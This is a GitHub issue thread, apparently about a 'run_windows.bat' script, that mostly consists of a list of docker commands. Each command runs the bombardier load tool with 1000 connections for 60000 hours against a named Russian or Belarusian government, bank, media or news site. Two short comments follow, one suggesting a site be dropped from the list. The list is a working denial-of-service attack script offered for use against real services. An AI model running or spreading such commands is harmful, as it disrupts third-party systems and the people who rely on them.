### ISSUE TITLE
run_windows.bat Quick fix

### ISSUE THREAD

**Issue by GauldothHD** [almerico/bombardier#5]
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://mil.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://www.scrf.gov.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://ach.gov.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://epp.genproc.gov.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.gosuslugi.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://kremlin.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://mid.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.1tv.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://pnp.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://fsb.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.rt.com/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://tass.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://vesti.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://yandex.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://iz.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://lenta.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://vgtrk.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://ria.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://rambler.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://gazeta.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://duma.gov.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://belta.by
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://mk.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://gazprom.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://gazprombank.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://znak.com
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://cbr.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://sberbank.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://vtb.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://rosbank.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://kp.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://karaulovlife.ru
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://news-front.info/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://rusnext.ru/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://life.ru/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.mid-dnr.su/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.5-tv.ru/live/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://zvezda.ru/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://www.politnavigator.net/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://russian.rt.com/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://lt.sputniknews.ru/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://sputniknews.lt/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://sputnik-abkhazia.ru/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://francais.rt.com/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://novorosinform.org/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l https://ren.tv/
docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://tvzvezda.ru/

**Comment by AnthonyKot** [comment]
I'd remove https://www.znak.com/ because they look more or less fine

**Comment by almerico** [comment]
rewrited
